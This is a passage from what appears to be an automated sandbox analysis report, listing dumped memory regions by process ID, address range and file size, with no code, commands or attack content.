                                                                                                                                                                • memory/204-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/212-383-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/400-400-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/804-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/1400-297-0x0000000004350000-0x0000000004455000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  1.0MB

                                                                                                                                                                • memory/1400-317-0x0000000000400000-0x0000000002489000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  32.5MB

                                                                                                                                                                • memory/1400-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/1628-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/1792-385-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2012-298-0x00000000024F0000-0x000000000263A000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  1.3MB

                                                                                                                                                                • memory/2012-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2012-301-0x0000000000400000-0x0000000002402000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  32.0MB

                                                                                                                                                                • memory/2176-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2176-295-0x0000000005880000-0x0000000005881000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2176-213-0x0000000077320000-0x00000000774AE000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  1.6MB

                                                                                                                                                                • memory/2176-224-0x0000000000280000-0x0000000000281000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2188-375-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2188-387-0x0000000002DE0000-0x0000000002DE1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2216-374-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2220-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2220-535-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2256-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2256-215-0x00000000028D0000-0x00000000028D1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2256-178-0x00000000004D0000-0x00000000004D1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2276-377-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2448-302-0x0000000004130000-0x000000000414C000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  112KB

                                                                                                                                                                • memory/2448-300-0x0000000000400000-0x00000000023C1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  31.8MB

                                                                                                                                                                • memory/2448-318-0x00000000047D3000-0x00000000047D4000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2448-312-0x00000000047D0000-0x00000000047D1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2448-293-0x0000000003ED0000-0x0000000003EFF000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  188KB

                                                                                                                                                                • memory/2448-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2448-335-0x00000000047D4000-0x00000000047D6000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  8KB

                                                                                                                                                                • memory/2448-315-0x00000000047D2000-0x00000000047D3000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2460-183-0x0000000004BE0000-0x0000000004BE1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2460-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2460-196-0x0000000004B80000-0x0000000004B81000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2460-163-0x0000000000370000-0x0000000000371000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2460-200-0x0000000004E50000-0x0000000004E51000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2480-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2648-313-0x00000000058B0000-0x00000000058B1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2648-276-0x00000000010E0000-0x00000000010E1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2648-223-0x0000000077320000-0x00000000774AE000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  1.6MB

                                                                                                                                                                • memory/2648-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2732-349-0x0000000004910000-0x0000000005236000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  9.1MB

                                                                                                                                                                • memory/2732-361-0x0000000000400000-0x00000000027DB000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  35.9MB

                                                                                                                                                                • memory/2732-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2740-249-0x0000000005DA0000-0x0000000005DA1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2740-282-0x0000000005D90000-0x0000000005D91000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2740-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/2740-284-0x0000000005D30000-0x0000000005D31000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2740-243-0x0000000005D00000-0x0000000005D01000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2740-240-0x00000000063B0000-0x00000000063B1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2740-222-0x0000000000A70000-0x0000000000A71000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2740-221-0x0000000077320000-0x00000000774AE000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  1.6MB

                                                                                                                                                                • memory/2796-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3024-114-0x0000000003E20000-0x0000000003F5F000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  1.2MB

                                                                                                                                                                • memory/3176-185-0x0000000000210000-0x0000000000211000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3176-203-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3176-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3212-214-0x0000000005230000-0x0000000005231000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3212-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3212-230-0x0000000007730000-0x0000000007C2E000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  5.0MB

                                                                                                                                                                • memory/3212-219-0x0000000007AD0000-0x0000000007AD1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3212-184-0x0000000007690000-0x0000000007691000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3212-161-0x0000000000800000-0x0000000000801000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3212-187-0x0000000007C30000-0x0000000007C31000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3212-191-0x00000000077D0000-0x00000000077D1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3244-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3348-229-0x0000000001150000-0x0000000001151000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3348-288-0x00000000058A0000-0x00000000058A1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3348-212-0x0000000077320000-0x00000000774AE000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  1.6MB

                                                                                                                                                                • memory/3348-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3520-390-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3720-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3748-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3772-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3772-154-0x0000000000BE0000-0x0000000000BF0000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  64KB

                                                                                                                                                                • memory/3772-157-0x0000000000F50000-0x0000000000F62000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  72KB

                                                                                                                                                                • memory/3832-386-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3860-303-0x0000000000400000-0x00000000023BB000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  31.7MB

                                                                                                                                                                • memory/3860-286-0x00000000023C0000-0x000000000246E000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  696KB

                                                                                                                                                                • memory/3860-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/3964-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4192-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4192-182-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  80KB

                                                                                                                                                                • memory/4224-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4288-320-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-254-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-332-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-325-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-269-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-241-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-275-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-264-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-260-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-322-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-190-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4288-327-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-227-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-236-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-210-0x0000000003950000-0x000000000398C000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  240KB

                                                                                                                                                                • memory/4288-234-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-247-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-251-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-237-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-238-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4288-244-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4300-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4308-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4324-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4352-211-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  12KB

                                                                                                                                                                • memory/4352-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4396-306-0x000001B70C850000-0x000001B70C91F000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  828KB

                                                                                                                                                                • memory/4396-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4396-308-0x000001B70C7E0000-0x000001B70C84F000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  444KB

                                                                                                                                                                • memory/4580-397-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4616-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4708-394-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4728-399-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4768-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4796-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4816-289-0x0000000005300000-0x0000000005906000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  6.0MB

                                                                                                                                                                • memory/4816-253-0x0000000000418E52-mapping.dmp
                                                                                                                                                                • memory/4816-250-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  120KB

                                                                                                                                                                • memory/4844-252-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  288KB

                                                                                                                                                                • memory/4844-291-0x00000000056D0000-0x0000000005CD6000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  6.0MB

                                                                                                                                                                • memory/4844-257-0x000000000041A8EA-mapping.dmp
                                                                                                                                                                • memory/4844-343-0x000000007EA90000-0x000000007EA91000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4844-283-0x00000000058B0000-0x00000000058B1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/4904-373-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/4912-279-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  644KB

                                                                                                                                                                • memory/4912-266-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  644KB

                                                                                                                                                                • memory/4912-270-0x000000000046B77D-mapping.dmp
                                                                                                                                                                • memory/5016-384-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  80KB

                                                                                                                                                                • memory/5016-376-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/5136-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/5160-405-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/5240-517-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/5256-471-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/5324-412-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/5388-490-0x00007FF6B6664060-mapping.dmp
                                                                                                                                                                • memory/5868-534-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/5904-511-0x000000000043DC85-mapping.dmp
                                                                                                                                                                • memory/5908-537-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/5984-456-0x0000000000000000-mapping.dmp
                                                                                                                                                                • memory/6012-459-0x0000000000000000-mapping.dmp